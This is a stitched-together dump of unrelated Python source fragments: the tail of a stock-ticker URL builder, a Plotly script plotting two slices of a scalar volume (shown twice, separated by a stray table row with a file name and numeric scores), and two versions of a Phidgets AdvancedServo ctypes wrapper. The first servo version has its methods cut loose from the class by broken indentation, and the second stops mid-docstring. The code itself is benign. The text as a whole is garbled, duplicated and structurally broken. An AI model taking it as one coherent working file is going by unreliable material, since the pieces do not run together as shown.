            # Read-only is sufficient; the original opened with 'r+'.
            with open("final_ticker_symbols.json", 'r', encoding='utf-8') as file:
                tickers = json.load(file)
            return tuple(tickers)
        except OSError:
            self.log('file not found', logging.WARNING)
            return ()

    def __get_urls(self, tickers: tuple) -> tuple:
        '''Build one BASE_URL per ticker.

        Arguments:
            tickers (tuple): the ticker symbols.

        Returns:
            tuple: formatted URLs, same order as *tickers* (the symbol
            appears twice in each URL: path and ?p= query).
        '''
        return tuple(self.BASE_URL.format(ticker, ticker) for ticker in tickers)
import plotly
import plotly.graph_objs as pgo
import numpy as np
# "BrBG" (brown <-> blue-green) diverging colorscale as (position, color)
# stops spanning [0, 1], used as the default Plotly `colorscale` for slices.
pl_BrBG = [
    [0.0, "rgb(84, 48, 5)"],
    [0.1, "rgb(138, 80, 9)"],
    [0.2, "rgb(191, 129, 45)"],
    [0.3, "rgb(222, 192, 123)"],
    [0.4, "rgb(246, 232, 195)"],
    [0.5, "rgb(244, 244, 244)"],
    [0.6, "rgb(199, 234, 229)"],
    [0.7, "rgb(126, 203, 192)"],
    [0.8, "rgb(53, 151, 143)"],
    [0.9, "rgb(0, 101, 93)"],
    [1.0, "rgb(0, 60, 48)"],
]
def get_the_slice(x, y, z, surfacecolor, colorscale=pl_BrBG, showscale=False):
    """Build a Plotly Surface trace for one slice through the volume.

    x/y/z are 2-D coordinate grids and `surfacecolor` holds the scalar
    field sampled on the slice.
    https://plot.ly/python/reference/#surface
    """
    return pgo.Surface(
        x=x, y=y, z=z, surfacecolor=surfacecolor, colorscale=colorscale, showscale=showscale
    )
def get_lims_colors(surfacecolor):
    """Return (min, max) of a slice's color values, for shared color limits."""
    lo = np.min(surfacecolor)
    hi = np.max(surfacecolor)
    return lo, hi
def main():
    """Plot two slices (z = 0 and y = -0.5) of a scalar volume and write
    the figure to Slice-volumetric-2.html via plotly offline.
    """

    def volume(x, y, z):
        # Scalar field sampled on every slice.
        return x * np.exp(-x ** 2 - y ** 2 - z ** 2)

    # NOTE: the original began with an oblique-slice setup
    # (z = -x * tan(pi/5)); every variable from it was recomputed below
    # before first use, so that dead code has been removed.

    # z = 0 slice.
    x = np.linspace(-2, 2, 50)
    y = np.linspace(-2, 2, 50)
    x, y = np.meshgrid(x, y)
    z = np.zeros(x.shape)
    surfcolor_z = volume(x, y, z)
    sminz, smaxz = get_lims_colors(surfcolor_z)
    slice_z = get_the_slice(x, y, z, surfcolor_z)

    # y = -0.5 slice.
    x = np.linspace(-2, 2, 50)
    z = np.linspace(-2, 2, 50)
    # Fixed: the original called np.meshgrid(x, y), which only produced
    # the right grid because y happened to hold the same linspace as z.
    x, z = np.meshgrid(x, z)
    y = -0.5 * np.ones(x.shape)

    axis = dict(
        showbackground=True,
        backgroundcolor="rgb(230, 230,230)",
        gridcolor="rgb(255, 255, 255)",
        zerolinecolor="rgb(255, 255, 255)",
    )
    layout = dict(
        title="Slices in volumetric data",
        width=700,
        height=700,
        scene=dict(
            xaxis=pgo.layout.scene.XAxis(axis),
            yaxis=pgo.layout.scene.YAxis(axis),
            zaxis=pgo.layout.scene.ZAxis(axis, range=[-2, 2]),
            aspectratio=dict(x=1, y=1, z=1),
        ),
    )

    # Share one color range across both slices so their colors compare.
    surfcolor_obl = volume(x, y, z)
    smino, smaxo = get_lims_colors(surfcolor_obl)
    vmin = min([sminz, smino])
    vmax = max([smaxz, smaxo])
    slice_obl = get_the_slice(x, y, z, surfcolor_obl)
    slice_obl.update(cmin=vmin, cmax=vmax, showscale=True)
    slice_z.update(cmin=vmin, cmax=vmax)

    fig = pgo.Figure(data=[slice_z, slice_obl], layout=layout)
    plotly.offline.plot(fig, filename="Slice-volumetric-2.html")
if __name__ == "__main__":
main() | slice3d.py | import plotly
import plotly.graph_objs as pgo
import numpy as np
# "BrBG" (brown <-> blue-green) diverging colorscale as (position, color)
# stops spanning [0, 1], used as the default Plotly `colorscale` for slices.
pl_BrBG = [
    [0.0, "rgb(84, 48, 5)"],
    [0.1, "rgb(138, 80, 9)"],
    [0.2, "rgb(191, 129, 45)"],
    [0.3, "rgb(222, 192, 123)"],
    [0.4, "rgb(246, 232, 195)"],
    [0.5, "rgb(244, 244, 244)"],
    [0.6, "rgb(199, 234, 229)"],
    [0.7, "rgb(126, 203, 192)"],
    [0.8, "rgb(53, 151, 143)"],
    [0.9, "rgb(0, 101, 93)"],
    [1.0, "rgb(0, 60, 48)"],
]
def get_the_slice(x, y, z, surfacecolor, colorscale=pl_BrBG, showscale=False):
    """Build a Plotly Surface trace for one slice through the volume.

    x/y/z are 2-D coordinate grids and `surfacecolor` holds the scalar
    field sampled on the slice.
    https://plot.ly/python/reference/#surface
    """
    return pgo.Surface(
        x=x, y=y, z=z, surfacecolor=surfacecolor, colorscale=colorscale, showscale=showscale
    )
def get_lims_colors(surfacecolor):
    """Color limits for a slice: the (min, max) of its surface colors."""
    return (np.amin(surfacecolor), np.amax(surfacecolor))
def main():
    """Plot two slices (z = 0 and y = -0.5) of a scalar volume and write
    the figure to Slice-volumetric-2.html via plotly offline.
    """

    def volume(x, y, z):
        # Scalar field sampled on every slice.
        return x * np.exp(-x ** 2 - y ** 2 - z ** 2)

    # NOTE: the original began with an oblique-slice setup
    # (z = -x * tan(pi/5)); every variable from it was recomputed below
    # before first use, so that dead code has been removed.

    # z = 0 slice.
    x = np.linspace(-2, 2, 50)
    y = np.linspace(-2, 2, 50)
    x, y = np.meshgrid(x, y)
    z = np.zeros(x.shape)
    surfcolor_z = volume(x, y, z)
    sminz, smaxz = get_lims_colors(surfcolor_z)
    slice_z = get_the_slice(x, y, z, surfcolor_z)

    # y = -0.5 slice.
    x = np.linspace(-2, 2, 50)
    z = np.linspace(-2, 2, 50)
    # Fixed: the original called np.meshgrid(x, y), which only produced
    # the right grid because y happened to hold the same linspace as z.
    x, z = np.meshgrid(x, z)
    y = -0.5 * np.ones(x.shape)

    axis = dict(
        showbackground=True,
        backgroundcolor="rgb(230, 230,230)",
        gridcolor="rgb(255, 255, 255)",
        zerolinecolor="rgb(255, 255, 255)",
    )
    layout = dict(
        title="Slices in volumetric data",
        width=700,
        height=700,
        scene=dict(
            xaxis=pgo.layout.scene.XAxis(axis),
            yaxis=pgo.layout.scene.YAxis(axis),
            zaxis=pgo.layout.scene.ZAxis(axis, range=[-2, 2]),
            aspectratio=dict(x=1, y=1, z=1),
        ),
    )

    # Share one color range across both slices so their colors compare.
    surfcolor_obl = volume(x, y, z)
    smino, smaxo = get_lims_colors(surfcolor_obl)
    vmin = min([sminz, smino])
    vmax = max([smaxz, smaxo])
    slice_obl = get_the_slice(x, y, z, surfcolor_obl)
    slice_obl.update(cmin=vmin, cmax=vmax, showscale=True)
    slice_z.update(cmin=vmin, cmax=vmax)

    fig = pgo.Figure(data=[slice_z, slice_obl], layout=layout)
    plotly.offline.plot(fig, filename="Slice-volumetric-2.html")
if __name__ == "__main__":
main() | 0.771069 | 0.518485 |
__author__ = '<NAME>'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import CurrentChangeEventArgs, PositionChangeEventArgs, VelocityChangeEventArgs
import sys
class AdvancedServo(Phidget):
"""This class represents a Phidget AdvancedServo Controller.
All methods to control a AdvancedServo Controller are implemented in this class.
See the product manual for more specific API details, supported functionality, units, etc.
Extends:
Phidget
"""
#servoTypes = {'DEFAULT':1, 'RAW_us_MODE':2, 'HITEC_HS322HD':3, 'HITEC_HS5245MG':4, 'HITEC_805BB':5, 'HITEC_HS422':6, 'TOWERPRO_MG90':7, 'USER_DEFINED':8, 'INVALID':0}
def __init__(self):
    """Create an AdvancedServo handle and prepare the ctypes callback types.

    Exceptions:
        RuntimeError - If current platform is not supported/phidget c dll
            cannot be found.
    """
    Phidget.__init__(self)
    # User-supplied Python callbacks...
    self.__currentChange = None
    self.__positionChange = None
    self.__velocityChange = None
    # ...and the ctypes wrappers actually registered with the C library
    # (stored on self so they are not garbage-collected while registered).
    self.__onCurrentChange = None
    self.__onPositionChange = None
    self.__onVelocityChange = None
    PhidgetLibrary.getDll().CPhidgetAdvancedServo_create(byref(self.handle))
    # Windows callbacks use stdcall (WINFUNCTYPE); everything else cdecl.
    # Fixed: the original matched only 'darwin'/'linux2', which left the
    # handler types undefined on Python 3 Linux ('linux') and the BSDs.
    if sys.platform == 'win32':
        functype = WINFUNCTYPE
    else:
        functype = CFUNCTYPE
    self.__CURRENTCHANGEHANDLER = functype(c_int, c_void_p, c_void_p, c_int, c_double)
    self.__POSITIONCHANGEHANDLER = functype(c_int, c_void_p, c_void_p, c_int, c_double)
    self.__VELOCITYCHANGEHANDLER = functype(c_int, c_void_p, c_void_p, c_int, c_double)
def __del__(self):
    """Destructor: release the underlying C phidget handle via Phidget.dispose."""
    Phidget.dispose(self)
def getMotorCount(self):
    """Return the number of motors this Phidget can support.

    There is no way to programmatically determine how many motors are
    actually attached to the board.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - if this Phidget is not opened and attached.
    """
    count = c_int()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getMotorCount(self.handle, byref(count))
    if result > 0:
        raise PhidgetException(result)
    return count.value
def getAcceleration(self, index):
    """Return motor *index*'s acceleration setting.

    The value lies in [getAccelerationMin, getAccelerationMax] and
    controls how fast the controller changes a motor's speed.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    accel = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAcceleration(self.handle, c_int(index), byref(accel))
    if result > 0:
        raise PhidgetException(result)
    return accel.value

def setAcceleration(self, index, value):
    """Set motor *index*'s acceleration (range getAccelerationMin..Max).

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index/value invalid.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setAcceleration(self.handle, c_int(index), c_double(value))
    if result > 0:
        raise PhidgetException(result)

def getAccelerationMax(self, index):
    """Return the maximum acceleration motor *index* accepts.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached.
    """
    accel_max = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMax(self.handle, c_int(index), byref(accel_max))
    if result > 0:
        raise PhidgetException(result)
    return accel_max.value

def getAccelerationMin(self, index):
    """Return the minimum acceleration motor *index* accepts.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached.
    """
    accel_min = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMin(self.handle, c_int(index), byref(accel_min))
    if result > 0:
        raise PhidgetException(result)
    return accel_min.value

def getVelocityLimit(self, index):
    """Return the last velocity limit set for motor *index*
    (range getVelocityMin..getVelocityMax).

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    velocity_limit = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityLimit(self.handle, c_int(index), byref(velocity_limit))
    if result > 0:
        raise PhidgetException(result)
    return velocity_limit.value

def setVelocityLimit(self, index, value):
    """Set the velocity limit for motor *index*
    (range getVelocityMin..getVelocityMax).

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index/value invalid.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setVelocityLimit(self.handle, c_int(index), c_double(value))
    if result > 0:
        raise PhidgetException(result)

def getVelocity(self, index):
    """Return the current velocity of motor *index*
    (between getVelocityMin and getVelocityLimit).

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    velocity = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocity(self.handle, c_int(index), byref(velocity))
    if result > 0:
        raise PhidgetException(result)
    return velocity.value

def getVelocityMax(self, index):
    """Return the maximum velocity that can be set for motor *index*.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    velocity_max = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMax(self.handle, c_int(index), byref(velocity_max))
    if result > 0:
        raise PhidgetException(result)
    return velocity_max.value

def getVelocityMin(self, index):
    """Return the minimum velocity that can be set for motor *index*.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    velocity_min = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMin(self.handle, c_int(index), byref(velocity_min))
    if result > 0:
        raise PhidgetException(result)
    return velocity_min.value
def __nativeVelocityChangeEvent(self, handle, usrptr, index, value):
    # Bridge from the C callback into the user's Python handler, if any.
    callback = self.__velocityChange
    if callback is not None:
        callback(VelocityChangeEventArgs(self, index, value))
    return 0
def setOnVelocityChangeHandler(self, velocityChangeHandler):
    """Register the VelocityChange callback (or clear it with None).

    Velocity changes are reported back from the controller and so
    correspond to actual motor velocity over time.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException
    """
    if velocityChangeHandler is None:
        self.__velocityChange = None
        self.__onVelocityChange = None
    else:
        self.__velocityChange = velocityChangeHandler
        # Keep the ctypes wrapper alive on self while it is registered.
        self.__onVelocityChange = self.__VELOCITYCHANGEHANDLER(self.__nativeVelocityChangeEvent)
    try:
        result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnVelocityChange_Handler(self.handle, self.__onVelocityChange, None)
    except RuntimeError:
        # Roll back so a failed registration leaves no dangling callback.
        self.__velocityChange = None
        self.__onVelocityChange = None
        raise
    if result > 0:
        raise PhidgetException(result)
def getPosition(self, index):
    """Return the position of servo *index* (roughly degrees).

    Servos give no feedback, so this is simply the last commanded
    position; it is unknown until a position has been set, and querying
    a disengaged servo raises. The range is getPositionMin..Max, though
    most servos cannot traverse the whole span.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not attached, index out of range, or motor
            not engaged.
    """
    pos = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPosition(self.handle, c_int(index), byref(pos))
    if result > 0:
        raise PhidgetException(result)
    return pos.value
def setPosition(self, index, value):
    """Command servo *index* to a position (roughly degrees).

    The range is getPositionMin..getPositionMax; most servos only cover
    part of it (typically ~25-180 degrees, servo-dependent).

    Parameters:
        index<int>: index of the motor.
        value<double>: desired position for the motor.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not attached, index or position out of range,
            or motor not engaged.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPosition(self.handle, c_int(index), c_double(value))
    if result > 0:
        raise PhidgetException(result)

def getPositionMax(self, index):
    """Return the maximum position servo *index* will accept (degrees).

    Parameters:
        index<int>: index of the motor.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - if this Phidget is not opened and attached.
    """
    position_max = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMax(self.handle, c_int(index), byref(position_max))
    if result > 0:
        raise PhidgetException(result)
    return position_max.value

def setPositionMax(self, index, value):
    """Set the maximum position limit of servo *index*.

    Parameters:
        index<int>: index of the motor.
        value<double>: desired maximum position limit.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not attached, index out of range, or limit
            out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMax(self.handle, c_int(index), c_double(value))
    if result > 0:
        raise PhidgetException(result)

def getPositionMin(self, index):
    """Return the minimum position servo *index* will accept (degrees).

    Parameters:
        index<int>: index of the motor.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - if this Phidget is not opened and attached.
    """
    position_min = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMin(self.handle, c_int(index), byref(position_min))
    if result > 0:
        raise PhidgetException(result)
    return position_min.value

def setPositionMin(self, index, value):
    """Set the minimum position limit of servo *index*.

    Parameters:
        index<int>: index of the motor.
        value<double>: desired minimum position limit.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not attached, index out of range, or limit
            out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMin(self.handle, c_int(index), c_double(value))
    if result > 0:
        raise PhidgetException(result)
def __nativePositionChangeEvent(self, handle, usrptr, index, value):
    # Bridge from the C callback into the user's Python handler, if any.
    callback = self.__positionChange
    if callback is not None:
        callback(PositionChangeEventArgs(self, index, value))
    return 0
def setOnPositionChangeHandler(self, positionChangeHandler):
    """Register the PositionChange callback (or clear it with None).

    Fires after every call to setPosition.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException
    """
    if positionChangeHandler is None:
        self.__positionChange = None
        self.__onPositionChange = None
    else:
        self.__positionChange = positionChangeHandler
        # Keep the ctypes wrapper alive on self while it is registered.
        self.__onPositionChange = self.__POSITIONCHANGEHANDLER(self.__nativePositionChangeEvent)
    try:
        result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnPositionChange_Handler(self.handle, self.__onPositionChange, None)
    except RuntimeError:
        # Roll back so a failed registration leaves no dangling callback.
        self.__positionChange = None
        self.__onPositionChange = None
        raise
    if result > 0:
        raise PhidgetException(result)
def getCurrent(self, index):
    """Return the current usage of motor *index*.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    amps = c_double()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getCurrent(self.handle, c_int(index), byref(amps))
    if result > 0:
        raise PhidgetException(result)
    return amps.value
def __nativeCurrentChangeEvent(self, handle, usrptr, index, value):
    # Bridge from the C callback into the user's Python handler, if any.
    callback = self.__currentChange
    if callback is not None:
        callback(CurrentChangeEventArgs(self, index, value))
    return 0
def setOnCurrentChangeHandler(self, currentChangeHandler):
    """Register the CurrentChange callback (or clear it with None).

    Called when the current consumed by a motor changes.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException
    """
    if currentChangeHandler is None:
        self.__currentChange = None
        self.__onCurrentChange = None
    else:
        self.__currentChange = currentChangeHandler
        # Keep the ctypes wrapper alive on self while it is registered.
        self.__onCurrentChange = self.__CURRENTCHANGEHANDLER(self.__nativeCurrentChangeEvent)
    try:
        result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnCurrentChange_Handler(self.handle, self.__onCurrentChange, None)
    except RuntimeError:
        # Roll back so a failed registration leaves no dangling callback.
        self.__currentChange = None
        self.__onCurrentChange = None
        raise
    if result > 0:
        raise PhidgetException(result)
def getSpeedRampingOn(self, index):
    """Return True when speed ramping (use of velocity/acceleration
    limits) is enabled for motor *index*.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    state = c_int()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getSpeedRampingOn(self.handle, c_int(index), byref(state))
    if result > 0:
        raise PhidgetException(result)
    return state.value == 1

def setSpeedRampingOn(self, index, state):
    """Enable or disable speed ramping for motor *index*.

    Any truthy *state* enables ramping. (Fixed: the original compared
    `state == True`, silently disabling ramping for truthy non-bool
    values such as 2.)

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setSpeedRampingOn(self.handle, c_int(index), c_int(1 if state else 0))
    if result > 0:
        raise PhidgetException(result)

def getEngaged(self, index):
    """Return True when motor *index* is engaged (powered).

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    state = c_int()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getEngaged(self.handle, c_int(index), byref(state))
    if result > 0:
        raise PhidgetException(result)
    return state.value == 1

def setEngaged(self, index, state):
    """Engage (power) or disengage motor *index*.

    Any truthy *state* engages the motor. (Fixed: the original compared
    `state == True`, silently disengaging for truthy non-bool values.)

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setEngaged(self.handle, c_int(index), c_int(1 if state else 0))
    if result > 0:
        raise PhidgetException(result)

def getStopped(self, index):
    """Return True when motor *index* is not moving and has no
    outstanding commands.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or invalid index.
    """
    state = c_int()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getStopped(self.handle, c_int(index), byref(state))
    if result > 0:
        raise PhidgetException(result)
    return state.value == 1
def getServoType(self, index):
    """Return the servo-type code configured for motor *index*.

    Parameters:
        index<int>: index of a servo motor.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index out of range.
    """
    servo_type = c_int()
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getServoType(self.handle, c_int(index), byref(servo_type))
    if result > 0:
        raise PhidgetException(result)
    return servo_type.value

def setServoType(self, index, servoType):
    """Set the servo-type code for motor *index*.

    Parameters:
        index<int>: index of a servo motor.
        servoType<int>: the desired servo type for the motor.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoType(self.handle, c_int(index), c_int(servoType))
    if result > 0:
        raise PhidgetException(result)
def setServoParameters(self, index, minimumPulseWidth, maximumPulseWidth, degrees, velocityMax):
    """Define a custom servo profile for a servo not in the predefined list.

    Pulse widths are specified in microseconds.

    Parameters:
        index<int>: index of a servo motor.
        minimumPulseWidth<double>: minimum pulse width for this servo type.
        maximumPulseWidth<double>: maximum pulse width for this servo type.
        degrees<double>: maximum rotation this servo type is capable of.
        velocityMax<double>: maximum velocity this servo type is capable of.

    Exceptions:
        RuntimeError - phidget c dll cannot be found / platform unsupported.
        PhidgetException - not opened and attached, or index out of range.
    """
    result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoParameters(
        self.handle, c_int(index), c_double(minimumPulseWidth),
        c_double(maximumPulseWidth), c_double(degrees), c_double(velocityMax))
    if result > 0:
        raise PhidgetException(result)
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import CurrentChangeEventArgs, PositionChangeEventArgs, VelocityChangeEventArgs
import sys
class AdvancedServo(Phidget):
    """This class represents a Phidget AdvancedServo Controller.

    All methods to control an AdvancedServo Controller are implemented in this
    class.  See the product manual for more specific API details, supported
    functionality, units, etc.

    Unless noted otherwise, every accessor/mutator below can raise:
        RuntimeError - if the current platform is not supported or the phidget
            c dll cannot be found.
        PhidgetException - if this Phidget is not opened and attached, or if
            an index/value argument is out of range.

    Extends:
        Phidget
    """
    #servoTypes = {'DEFAULT':1, 'RAW_us_MODE':2, 'HITEC_HS322HD':3, 'HITEC_HS5245MG':4, 'HITEC_805BB':5, 'HITEC_HS422':6, 'TOWERPRO_MG90':7, 'USER_DEFINED':8, 'INVALID':0}

    def __init__(self):
        """The Constructor Method for the AdvancedServo Class.

        Exceptions:
            RuntimeError - If current platform is not supported/phidget c dll cannot be found
        """
        Phidget.__init__(self)
        self.__currentChange = None
        self.__positionChange = None
        self.__velocityChange = None
        self.__onCurrentChange = None
        self.__onPositionChange = None
        self.__onVelocityChange = None
        try:
            PhidgetLibrary.getDll().CPhidgetAdvancedServo_create(byref(self.handle))
        except RuntimeError:
            raise
        # All three native callbacks share one C signature; only the calling
        # convention differs per platform.  'linux2' was the Python 2 name,
        # Python 3 reports plain 'linux', so match by prefix.
        if sys.platform == 'win32':
            functype = WINFUNCTYPE
        elif sys.platform == 'darwin' or sys.platform.startswith('linux'):
            functype = CFUNCTYPE
        else:
            functype = None
        if functype is not None:
            handlerType = functype(c_int, c_void_p, c_void_p, c_int, c_double)
            self.__CURRENTCHANGEHANDLER = handlerType
            self.__POSITIONCHANGEHANDLER = handlerType
            self.__VELOCITYCHANGEHANDLER = handlerType

    def __del__(self):
        """The Destructor Method for the AdvancedServo Class."""
        Phidget.dispose(self)

    def __read(self, name, ctype, index=None):
        """Call CPhidgetAdvancedServo_<name> with an output parameter of type
        *ctype* (optionally preceded by a motor index) and return its value.

        Raises RuntimeError (dll missing) or PhidgetException (non-zero result
        code), exactly like the hand-written wrappers this helper replaces.
        """
        out = ctype()
        if index is None:
            args = (self.handle, byref(out))
        else:
            args = (self.handle, c_int(index), byref(out))
        try:
            result = getattr(PhidgetLibrary.getDll(), "CPhidgetAdvancedServo_" + name)(*args)
        except RuntimeError:
            raise
        if result > 0:
            raise PhidgetException(result)
        return out.value

    def __write(self, name, index, cvalue):
        """Call CPhidgetAdvancedServo_<name>(handle, index, cvalue), raising
        PhidgetException on a non-zero result code."""
        try:
            result = getattr(PhidgetLibrary.getDll(), "CPhidgetAdvancedServo_" + name)(self.handle, c_int(index), cvalue)
        except RuntimeError:
            raise
        if result > 0:
            raise PhidgetException(result)

    def getMotorCount(self):
        """Returns the number of motors this Phidget can support.

        Note that there is no way of programatically determining how many
        motors are actually attached to the board.

        Returns:
            The number of motors <int>.
        """
        return self.__read("getMotorCount", c_int)

    def getAcceleration(self, index):
        """Returns a motor's acceleration.

        The valid range is between getAccelerationMin and getAccelerationMax,
        and refers to how fast the controller will change the speed of a motor.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The acceleration of the motor <double>.
        """
        return self.__read("getAcceleration", c_double, index)

    def setAcceleration(self, index, value):
        """Sets a motor's acceleration.

        The valid range is between getAccelerationMin and getAccelerationMax.
        This controls how fast the motor changes speed.

        Parameters:
            index<int>: index of the motor.
            value<double>: requested acceleration for that motor.
        """
        self.__write("setAcceleration", index, c_double(value))

    def getAccelerationMax(self, index):
        """Returns the maximum acceleration that a motor will accept, or return.

        Parameters:
            index<int>: index of the motor.
        Returns:
            Maximum acceleration of the motor <double>.
        """
        return self.__read("getAccelerationMax", c_double, index)

    def getAccelerationMin(self, index):
        """Returns the minimum acceleration that a motor will accept, or return.

        Parameters:
            index<int>: index of the motor.
        Returns:
            Minimum acceleration of the motor <double>.
        """
        return self.__read("getAccelerationMin", c_double, index)

    def getVelocityLimit(self, index):
        """Gets the last set velocity limit for a motor
        (between getVelocityMin and getVelocityMax).

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current velocity limit of the motor <double>.
        """
        return self.__read("getVelocityLimit", c_double, index)

    def setVelocityLimit(self, index, value):
        """Sets the velocity limit for a motor
        (between getVelocityMin and getVelocityMax).

        Parameters:
            index<int>: index of the motor.
            value<double>: requested velocity limit for the motor.
        """
        self.__write("setVelocityLimit", index, c_double(value))

    def getVelocity(self, index):
        """Gets the current velocity of a motor
        (between getVelocityMin and getVelocityLimit).

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current velocity of the motor <double>.
        """
        return self.__read("getVelocity", c_double, index)

    def getVelocityMax(self, index):
        """Gets the maximum velocity that can be set for a motor.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The maximum velocity for the motor <double>.
        """
        return self.__read("getVelocityMax", c_double, index)

    def getVelocityMin(self, index):
        """Gets the minimum velocity that can be set for a motor.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The minimum velocity for the motor <double>.
        """
        return self.__read("getVelocityMin", c_double, index)

    def __nativeVelocityChangeEvent(self, handle, usrptr, index, value):
        # Trampoline invoked from C; forwards to the registered Python handler.
        if self.__velocityChange != None:
            self.__velocityChange(VelocityChangeEventArgs(self, index, value))
        return 0

    def setOnVelocityChangeHandler(self, velocityChangeHandler):
        """Sets the VelocityChange Event Handler.

        The velocity change handler is a method that will be called when the
        velocity of a motor changes.  These velocity changes are reported back
        from the controller and so correspond to actual motor velocity over time.
        Pass None to unregister.

        Parameters:
            velocityChangeHandler: hook to the velocityChangeHandler callback function.
        """
        if velocityChangeHandler == None:
            self.__velocityChange = None
            self.__onVelocityChange = None
        else:
            self.__velocityChange = velocityChangeHandler
            self.__onVelocityChange = self.__VELOCITYCHANGEHANDLER(self.__nativeVelocityChangeEvent)
        try:
            result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnVelocityChange_Handler(self.handle, self.__onVelocityChange, None)
        except RuntimeError:
            # Roll back the registration so Python state matches the dll.
            self.__velocityChange = None
            self.__onVelocityChange = None
            raise
        if result > 0:
            raise PhidgetException(result)

    def getPosition(self, index):
        """Returns the position of a servo motor.

        Servo motors offer no feedback, so this is simply whatever the servo
        was last set to; until a position has been set, it is unknown and this
        call raises.  The range is between getPositionMin and getPositionMax
        and corresponds approximately to an angle in degrees.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current position of the selected motor <double>.
        """
        return self.__read("getPosition", c_double, index)

    def setPosition(self, index, value):
        """Sets the position of a servo motor.

        The range is between getPositionMin and getPositionMax and corresponds
        approximately to an angle in degrees; most servos will not operate
        across this entire range (typically 25 - 180 degrees).

        Parameters:
            index<int>: index of the motor.
